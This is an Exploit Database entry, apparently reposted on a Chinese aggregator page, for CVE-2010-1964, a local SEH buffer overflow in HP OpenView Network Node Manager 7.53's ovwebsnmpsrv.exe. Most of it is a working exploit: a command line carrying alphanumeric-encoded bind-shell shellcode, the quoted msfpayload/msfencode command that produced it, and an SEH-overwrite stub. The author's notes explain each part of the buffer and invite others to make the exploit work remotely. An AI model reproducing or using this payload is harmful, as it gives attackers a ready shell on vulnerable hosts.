HP OpenView Network Node Manager (OV NNM) 7.53 – ‘ovwebsnmpsrv.exe’ Local Buffer Overflow (SEH)

• Exploit Database
• 32 阅读

• 作者： bitform
  日期： 2010-07-07
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14256/

• # Exploit Title: HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH)
  # Date: 07/06/2010
  # Author: bitform
  # Software Link: hp.com
  # Version: 7.53
  # Tested on: Windows XP SP2
  # CVE: CVE-2010-1964
  
  # Exploit:
  
  C:\Program Files\HP OpenView\www\bin\ovwebsnmpsrv.exe -dump AAAAAAAAAAAAUXf-9Tf-9Tf-9TU\AAAAAAAAAAAAAAAAAAAAAPYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlIxMYC0EPGpCPNiJEP1KbQtLKPRFPLKF2DLNkF2EDNkD2ExFoMgPJDfDqIoEaIPNLElPaQlFbDlGPJaHODMFaIWKRL0QBF7LKBrFpLKQRElFaJpNkQPD8OuIPCDCzEQHPF0LKQXGhNkBxEpEQHSKSElQYLKDtLKFaKfP1KOP1KpLlIQJoDMGqO7DxM0BUJTFcCMIhGKQmQ4CEKRBxLKBxQ4FaN3E6NkDLPKLKBxELEQJsLKC4NkC1HPMYG4GTQ4QKQKCQPYQJCaKOIpBxQOCjLKDRHkMVCmE8GCFRGpC0E8BWCCP2CoPTPhPLQgFFDGIoJuOHNpEQGpGpQ9HDPTBpBHFIMPPkGpIoKePPPPPPBpG0F0G0F0QxJJDOKoM0KOHULIO7DqIKQCE8C2GpFqQLK9HfPjDPCfCgPhIRIKEgE7KOIEBsBwBHH7KYDxKOIoJuQCCcF7PhQdJLEkKQKON5QGOyIWE8QeBNPMQqKON5BHQsBME4C0NiJCBwBwQGP1L6PjGbPYCfKRImBFO7G4FDGLC1FaNmPDGTFpKvGpG4QDPPCfQFF6CvBvBnBvF6QCQFBHQiJlEoNfKOJuK9IpBnF6CvIoP0BHDHOwGmCPKOHUMkJPH5MrF6BHMvJ5MmOmKOJuElDFCLFjOpKKM0BUEUOKG7GcQbBOCZC0CcKON5DJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYY5AZCCX,Y,XP\SX-1UUU-1PPP-N_ZZPSX-zzzd-{zzd-{zzMPCCCCCCCCCCCCCCCCCCCCCCCCCCCC
  
  # Notes: 
  
  This is the result of my research on CVE-2010-1964. Finding this vulnerability locally was trivial but getting
  a remote exploit via jovgraph.exe never quite worked out for me. I'm hoping someone will be able to make this
  a practical remote exploit. :D
  
  Overflowing many of the other command line options will overwrite SEH as well (e.g. -demo)
  
  Explanation of buffer:
  
  "UXf-9Tf-9Tf-9TU"
  Carve out EAX as the base register for the alphanumeric shellcode
  
  "PYIIIIIIIIIIIIIIII7QZ"...
  Alphanumeric bind shell
  # ./msfpayload windows/shell_bind_tcp LPORT=4444 RHOST=127.0.0.1 R | ./msfencode BufferRegister=EAX -e x86/alpha_mixed -t raw
  
   \/ Overwrite SEH
  []
  "YY5AZCCX,Y,XP\SX-1UUU-1PPP-N_ZZPSX-zzzd-{zzd-{zzMP"
  [ ]
  	 /\ Carve out non-conditional jmp to carve EAX code